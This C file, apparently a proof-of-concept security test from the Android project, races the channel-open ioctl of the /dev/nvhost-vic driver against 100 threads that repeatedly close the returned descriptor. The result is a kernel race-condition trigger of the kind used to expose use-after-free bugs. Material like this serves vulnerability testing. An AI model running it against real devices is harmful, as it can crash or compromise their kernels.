1 /*
2 * Copyright (C) 2017 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17 #include <string.h>
18 #include <stdio.h>
19 #include <stdlib.h>
20 #include <pthread.h>
21 #include <sys/ioctl.h>
22 #include <sys/mman.h>
23 #include <errno.h>
24 #include <sys/stat.h>
25 #include <fcntl.h>
26 #include <sched.h>
27 #include <sys/types.h>
28 #include <signal.h>
29 #include <unistd.h>
30
/* Print a failure message to stdout, followed by errno and its description. */
#define ERR(fmt, ...) \
    printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))

/* Element count of a real array; gives a wrong answer on a pointer. */
#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))

enum {
    CLOSE_THREAD_NUM = 100, /* closer threads started by main() */
    TRY_TIMES = 900,        /* channel-open requests issued by main() */
};

/* Device node this test program opens. */
#define DEV "/dev/nvhost-vic"
37
/*
 * Argument block for NVHOST_IOCTL_CHANNEL_OPEN. The request is encoded with
 * _IOR, i.e. the driver writes the result back; main() reads channel_fd after
 * a successful call.
 */
struct nvhost_channel_open_args {
    __s32 channel_fd; /* descriptor number reported by the driver */
};

/* ioctl type byte for this driver interface. */
#define NVHOST_IOCTL_MAGIC 'H'

/* Request number 112, sized by struct nvhost_channel_open_args. */
#define NVHOST_IOCTL_CHANNEL_OPEN \
    _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
45
/* Descriptor for DEV; opened and closed in main(). */
int fd;

/* Handles of the closer threads, filled in by pthread_create() in main(). */
pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };

/* Declared but not referenced by any code shown in this file. */
pthread_t toggle_thread_id;
49
/*
 * Restrict the calling thread to a single CPU.
 *
 * num: index of the CPU to run on.
 *
 * Returns whatever sched_setaffinity() returned: 0 on success, -1 on failure.
 * On failure a message with errno and its description is printed to stdout.
 */
static int set_affinity(int num)
{
    cpu_set_t cpus;

    CPU_ZERO(&cpus);
    CPU_SET(num, &cpus);

    /* A pid of 0 selects the caller. */
    int rc = sched_setaffinity(0, sizeof(cpus), &cpus);
    if (rc != -1) {
        return rc;
    }

    printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
    return rc;
}
62
/* Empty setup hook; nothing in the code shown here calls it. */
static void prepare()
{
}
67
/*
 * State shared between main() and the closer threads. volatile only keeps the
 * compiler from caching the values; it gives no atomicity or ordering, so
 * these accesses are unsynchronized.
 */
volatile int target_fd; /* descriptor number the closer threads pass to close() */
volatile int attack;    /* non-zero while the closer threads should keep looping */
/*
 * Closer-thread entry point.
 *
 * Pins itself to CPU 1, then every 200 microseconds calls close() on the
 * number currently stored in target_fd, until main() clears the attack flag.
 * close() acts on the descriptor number, so it affects whatever object that
 * number refers to at that moment; its return value is not inspected.
 *
 * no_use: ignored.
 * Returns NULL.
 */
void* close_thread(void* no_use)
{
    set_affinity(1);

    for (;;) {
        if (!attack) {
            break;
        }
        usleep(200);
        close(target_fd);
    }

    return NULL;
}
81
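/*
 * Concurrency check for the channel-open ioctl of DEV.
 *
 * Sequence:
 *   1. Pin the main thread to CPU 0 and open DEV.
 *   2. Request one channel descriptor and publish its number in target_fd.
 *   3. Start CLOSE_THREAD_NUM closer threads (pinned to CPU 1 by
 *      close_thread()) that keep calling close() on that number.
 *   4. Issue TRY_TIMES further channel-open requests, 200 microseconds apart,
 *      while the closers run.
 *   5. Stop and join the closers, then close DEV.
 *
 * Returns 0 on every path, so the exit status carries no verdict; the outcome
 * has to be judged from the state of the device under test (presumably its
 * kernel log).
 */
int main(void)
{
    struct nvhost_channel_open_args o_args = { 0 };
    int created = 0; /* closer threads actually started, i.e. safe to join */
    int i, ret;

    /* Keep the requesting thread on CPU 0. */
    set_affinity(0);

    fd = open(DEV, O_RDONLY);
    if (fd == -1) {
        ERR("[-] open failed");
        return 0;
    }
    printf("[+] open OK\n");

    ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
    if (ret == -1) {
        ERR("[-] ioctl failed");
        goto out_dev;
    }
    printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);

    /* The closers read this number; it is not updated again below. */
    target_fd = o_args.channel_fd;

    attack = 1;
    for (i = 0; i < CLOSE_THREAD_NUM; i++) {
        ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
        if (ret) {
            /* pthread_create() reports the error as its return value, not errno. */
            printf("[-] pthread_create failed: %d(%s)\n", ret, strerror(ret));
            goto out_close_thread;
        }
        created++;
    }

    for (i = 0; i < TRY_TIMES; i++) {
        /*
         * The return value is not inspected; only the first request above is
         * checked. Descriptors returned here are not tracked by main(), so
         * whatever is still open is released when the process exits.
         */
        (void)ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
        usleep(200);
    }

out_close_thread:
    attack = 0;
    /*
     * Join by count rather than by testing the handle against 0: pthread_t is
     * an opaque type and need not be comparable to an integer.
     */
    for (i = 0; i < created; i++) {
        pthread_join(close_thread_id[i], NULL);
    }
out_dev:
    close(fd);
    return 0;
}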
141